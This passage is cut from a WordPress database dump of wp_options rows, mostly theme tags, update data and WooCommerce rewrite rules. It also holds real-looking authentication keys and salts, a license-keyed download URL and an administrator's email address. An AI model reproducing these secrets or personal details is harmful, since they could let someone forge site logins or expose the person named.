8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:6:\"Layout\";a:9:{i:0;s:12:\"fixed-layout\";i:1;s:12:\"fluid-layout\";i:2;s:17:\"responsive-layout\";i:3;s:10:\"one-column\";i:4;s:11:\"two-columns\";i:5;s:13:\"three-columns\";i:6;s:12:\"four-columns\";i:7;s:12:\"left-sidebar\";i:8;s:13:\"right-sidebar\";}s:8:\"Features\";a:20:{i:0;s:19:\"accessibility-ready\";i:1;s:8:\"blavatar\";i:2;s:10:\"buddypress\";i:3;s:17:\"custom-background\";i:4;s:13:\"custom-colors\";i:5;s:13:\"custom-header\";i:6;s:11:\"custom-menu\";i:7;s:12:\"editor-style\";i:8;s:21:\"featured-image-header\";i:9;s:15:\"featured-images\";i:10;s:15:\"flexible-header\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}}','yes'),(1135,'_site_transient_timeout_theme_roots','1427743372','yes'),(1136,'_site_transient_theme_roots','a:2:{s:15:\"CherryFramework\";s:7:\"/themes\";s:10:\"theme49507\";s:7:\"/themes\";}','yes'),(114,'auth_salt','+Cu}[PQ{q${uyeN!|LRcHzK3^)T]o#)T6sKuX^A)juk`X,NkXK$|tgh@)Ql|$ytJ','yes'),(108,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:22:\"daniel@tualatinweb.com\";s:7:\"version\";s:5:\"4.1.1\";s:9:\"timestamp\";i:1424553027;}','yes'),(113,'auth_key','+^M[D]*$u~J/y=FJD49t=^{E&ew+3MHyAtC:)}^+}T01d#ihRo+W]Q094^pOza[:','yes'),(116,'logged_in_salt','}nckFJ~NohU=>5w;=bS;CP!Is1s0u&=Dqs+)cIL+g3P+Pi3X ?[B/:G7yrN!!w@D','yes'),(117,'nonce_key','_;0CYcu96bhYidW5^LMCBvJ^JoXE NK;oCC &L.]TY2Fye#e5?x~3csMo|glSOK%','yes'),(118,'nonce_salt','&FoNavMB} TQgE~#w|#{!i1|>=p[3U:>U2iQ,Yb56{(q6MqPe{}$1*)>+xA|<EFM','yes'),(119,'_site_transient_timeout_browser_d79cfcf0a2ea9707e32bbc0d6f1e197a','1423938710','yes'),(120,'_site_transient_browser_d79cfcf0a2ea9707e32bbc0d6f1e197a','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"40.0.2214.94\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(139,'WPLANG','','yes'),(1040,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1427106778','no'),(1041,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1427063578','no'),(1061,'cherry_new_version','3.1.5','yes'),(1062,'cherry_url_info','#','yes'),(1139,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1427741577;s:7:\"checked\";a:2:{s:15:\"CherryFramework\";s:5:\"3.1.4\";s:10:\"theme49507\";s:3:\"3.1\";}s:8:\"response\";a:1:{s:15:\"CherryFramework\";a:3:{s:7:\"package\";s:107:\"http://updates.cherry.template-help.com/cherrymoto/v3/api/download.php?key=a2b021f8e767d42f9f8b4a17f10fdc28\";s:11:\"new_version\";s:5:\"3.1.5\";s:3:\"url\";s:1:\"#\";}}s:12:\"translations\";a:0:{}}','yes'),(1017,'rewrite_rules','a:288:{s:22:\"^wc-api/v([1-2]{1})/?$\";s:51:\"index.php?wc-api-version=$matches[1]&wc-api-route=/\";s:24:\"^wc-api/v([1-2]{1})(.*)?\";s:61:\"index.php?wc-api-version=$matches[1]&wc-api-route=$matches[2]\";s:7:\"shop/?$\";s:27:\"index.php?post_type=product\";s:37:\"shop/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=product&feed=$matches[1]\";s:32:\"shop/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=product&feed=$matches[1]\";s:24:\"shop/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=product&paged=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:32:\"category/(.+?)/wc-api(/(.*))?/?$\";s:54:\"index.php?category_name=$matches[1]&wc-api=$matches[3]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:29:\"tag/([^/]+)/wc-api(/(.*))?/?$\";s:44:\"index.php?tag=$matches[1]&wc-api=$matches[3]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:55:\"product-category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_cat=$matches[1]&feed=$matches[2]\";s:50:\"product-category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_cat=$matches[1]&feed=$matches[2]\";s:43:\"product-category/(.+?)/page/?([0-9]{1,})/?$\";s:51:\"index.php?product_cat=$matches[1]&paged=$matches[2]\";s:25:\"product-category/(.+?)/?$\";s:33:\"index.php?product_cat=$matches[1]\";s:52:\"product-tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_tag=$matches[1]&feed=$matches[2]\";s:47:\"product-tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_tag=$matches[1]&feed=$matches[2]\";s:40:\"product-tag/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?product_tag=$matches[1]&paged=$matches[2]\";s:22:\"product-tag/([^/]+)/?$\";s:33:\"index.php?product_tag=$matches[1]\";s:35:\"product/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"product/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"product/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"product/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"product/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:28:\"product/([^/]+)/trackback/?$\";s:34:\"index.php?product=$matches[1]&tb=1\";s:48:\"product/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?product=$matches[1]&feed=$matches[2]\";s:43:\"product/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?product=$matches[1]&feed=$matches[2]\";s:36:\"product/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?product=$matches[1]&paged=$matches[2]\";s:43:\"product/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?product=$matches[1]&cpage=$matches[2]\";s:33:\"product/([^/]+)/wc-api(/(.*))?/?$\";s:48:\"index.php?product=$matches[1]&wc-api=$matches[3]\";s:39:\"product/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:50:\"product/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:28:\"product/([^/]+)(/[0-9]+)?/?$\";s:46:\"index.php?product=$matches[1]&page=$matches[2]\";s:24:\"product/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"product/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"product/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"product/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"product/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"product_variation/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:55:\"product_variation/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:75:\"product_variation/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"product_variation/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"product_variation/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"product_variation/([^/]+)/trackback/?$\";s:44:\"index.php?product_variation=$matches[1]&tb=1\";s:46:\"product_variation/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?product_variation=$matches[1]&paged=$matches[2]\";s:53:\"product_variation/([^/]+)/comment-page-([0-9]{1,})/?$\";s:57:\"index.php?product_variation=$matches[1]&cpage=$matches[2]\";s:43:\"product_variation/([^/]+)/wc-api(/(.*))?/?$\";s:58:\"index.php?product_variation=$matches[1]&wc-api=$matches[3]\";s:49:\"product_variation/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:60:\"product_variation/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:38:\"product_variation/([^/]+)(/[0-9]+)?/?$\";s:56:\"index.php?product_variation=$matches[1]&page=$matches[2]\";s:34:\"product_variation/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"product_variation/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"product_variation/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"product_variation/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"product_variation/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"shop_order_refund/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:55:\"shop_order_refund/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:75:\"shop_order_refund/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"shop_order_refund/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"shop_order_refund/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"shop_order_refund/([^/]+)/trackback/?$\";s:44:\"index.php?shop_order_refund=$matches[1]&tb=1\";s:46:\"shop_order_refund/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?shop_order_refund=$matches[1]&paged=$matches[2]\";s:53:\"shop_order_refund/([^/]+)/comment-page-([0-9]{1,})/?$\";s:57:\"index.php?shop_order_refund=$matches[1]&cpage=$matches[2]\";s:43:\"shop_order_refund/([^/]+)/wc-api(/(.*))?/?$\";s:58:\"index.php?shop_order_refund=$matches[1]&wc-api=$matches[3]\";s:49:\"shop_order_refund/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:60:\"shop_order_refund/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:38:\"shop_order_refund/([^/]+)(/[0-9]+)?/?$\";s:56:\"index.php?shop_order_refund=$matches[1]&page=$matches[2]\";s:34:\"shop_order_refund/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"shop_order_refund/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"shop_order_refund/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"shop_order_refund/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"shop_order_refund/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"shop_options/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"shop_options/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"shop_options/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"shop_options/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"shop_options/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"shop_options/([^/]+)/trackback/?$\";s:39:\"index.php?shop_options=$matches[1]&tb=1\";s:41:\"shop_options/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?shop_options=$matches[1]&paged=$matches[2]\";s:48:\"shop_options/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?shop_options=$matches[1]&cpage=$matches[2]\";s:38:\"shop_options/([^/]+)/wc-api(/(.*))?/?$\";s:53:\"index.php?shop_options=$matches[1]&wc-api=$matches[3]\";s:44:\"shop_options/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:55:\"shop_options/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:33:\"shop_options/([^/]+)(/[0-9]+)?/?$\";s:51:\"index.php?shop_options=$matches[1]&page=$matches[2]\";s:29:\"shop_options/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"shop_options/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"shop_options/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"shop_options/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"shop_options/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"slide-view/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"slide-view/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"slide-view/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"slide-view/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"slide-view/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"slide-view/([^/]+)/trackback/?$\";s:32:\"index.php?slide=$matches[1]&tb=1\";s:39:\"slide-view/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?slide=$matches[1]&paged=$matches[2]\";s:46:\"slide-view/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?slide=$matches[1]&cpage=$matches[2]\";s:36:\"slide-view/([^/]+)/wc-api(/(.*))?/?$\";s:46:\"index.php?slide=$matches[1]&wc-api=$matches[3]\";s:42:\"slide-view/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:53:\"slide-view/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:31:\"slide-view/([^/]+)(/[0-9]+)?/?$\";s:44:\"index.php?slide=$matches[1]&page=$matches[2]\";s:27:\"slide-view/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"slide-view/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"slide-view/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"slide-view/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"slide-view/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"portfolio-view/.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"portfolio-view/.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"portfolio-view/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"portfolio-view/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"portfolio-view/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"portfolio-view/(.+?)/trackback/?$\";s:36:\"index.php?portfolio=$matches[1]&tb=1\";s:41:\"portfolio-view/(.+?)/page/?([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&paged=$matches[2]\";s:48:\"portfolio-view/(.+?)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&cpage=$matches[2]\";s:38:\"portfolio-view/(.+?)/wc-api(/(.*))?/?$\";s:50:\"index.php?portfolio=$matches[1]&wc-api=$matches[3]\";s:44:\"portfolio-view/.+?/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:55:\"portfolio-view/.+?/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:33:\"portfolio-view/(.+?)(/[0-9]+)?/?$\";s:48:\"index.php?portfolio=$matches[1]&page=$matches[2]\";s:59:\"portfolio_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?portfolio_category=$matches[1]&feed=$matches[2]\";s:54:\"portfolio_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?portfolio_category=$matches[1]&feed=$matches[2]\";s:47:\"portfolio_category/([^/]+)/page/?([0-9]{1,})/?$\";s:58:\"index.php?portfolio_category=$matches[1]&paged=$matches[2]\";s:29:\"portfolio_category/([^/]+)/?$\";s:40:\"index.php?portfolio_category=$matches[1]\";s:54:\"portfolio_tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?portfolio_tag=$matches[1]&feed=$matches[2]\";s:49:\"portfolio_tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?portfolio_tag=$matches[1]&feed=$matches[2]\";s:42:\"portfolio_tag/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?portfolio_tag=$matches[1]&paged=$matches[2]\";s:24:\"portfolio_tag/([^/]+)/?$\";s:35:\"index.php?portfolio_tag=$matches[1]\";s:44:\"testimonial-view/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"testimonial-view/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"testimonial-view/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"testimonial-view/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"testimonial-view/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"testimonial-view/([^/]+)/trackback/?$\";s:32:\"index.php?testi=$matches[1]&tb=1\";s:45:\"testimonial-view/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?testi=$matches[1]&paged=$matches[2]\";s:52:\"testimonial-view/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?testi=$matches[1]&cpage=$matches[2]\";s:42:\"testimonial-view/([^/]+)/wc-api(/(.*))?/?$\";s:46:\"index.php?testi=$matches[1]&wc-api=$matches[3]\";s:48:\"testimonial-view/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:59:\"testimonial-view/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:37:\"testimonial-view/([^/]+)(/[0-9]+)?/?$\";s:44:\"index.php?testi=$matches[1]&page=$matches[2]\";s:33:\"testimonial-view/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"testimonial-view/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"testimonial-view/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"testimonial-view/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"testimonial-view/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"services-view/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"services-view/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"services-view/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"services-view/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"services-view/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"services-view/([^/]+)/trackback/?$\";s:35:\"index.php?services=$matches[1]&tb=1\";s:42:\"services-view/([^/]+)/page/?([0-9]{1,})/?$\";s:48:\"index.php?services=$matches[1]&paged=$matches[2]\";s:49:\"services-view/([^/]+)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?services=$matches[1]&cpage=$matches[2]\";s:39:\"services-view/([^/]+)/wc-api(/(.*))?/?$\";s:49:\"index.php?services=$matches[1]&wc-api=$matches[3]\";s:45:\"services-view/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:56:\"services-view/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:34:\"services-view/([^/]+)(/[0-9]+)?/?$\";s:47:\"index.php?services=$matches[1]&page=$matches[2]\";s:30:\"services-view/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"services-view/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"services-view/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"services-view/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"services-view/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"faq/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"faq/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"faq/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"faq/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"faq/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:24:\"faq/([^/]+)/trackback/?$\";s:30:\"index.php?faq=$matches[1]&tb=1\";s:32:\"faq/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?faq=$matches[1]&paged=$matches[2]\";s:39:\"faq/([^/]+)/comment-page-([0-9]{1,})/?$\";s:43:\"index.php?faq=$matches[1]&cpage=$matches[2]\";s:29:\"faq/([^/]+)/wc-api(/(.*))?/?$\";s:44:\"index.php?faq=$matches[1]&wc-api=$matches[3]\";s:35:\"faq/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:46:\"faq/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:24:\"faq/([^/]+)(/[0-9]+)?/?$\";s:42:\"index.php?faq=$matches[1]&page=$matches[2]\";s:20:\"faq/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:30:\"faq/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:50:\"faq/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:45:\"faq/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:45:\"faq/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"team-view/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"team-view/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"team-view/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|ato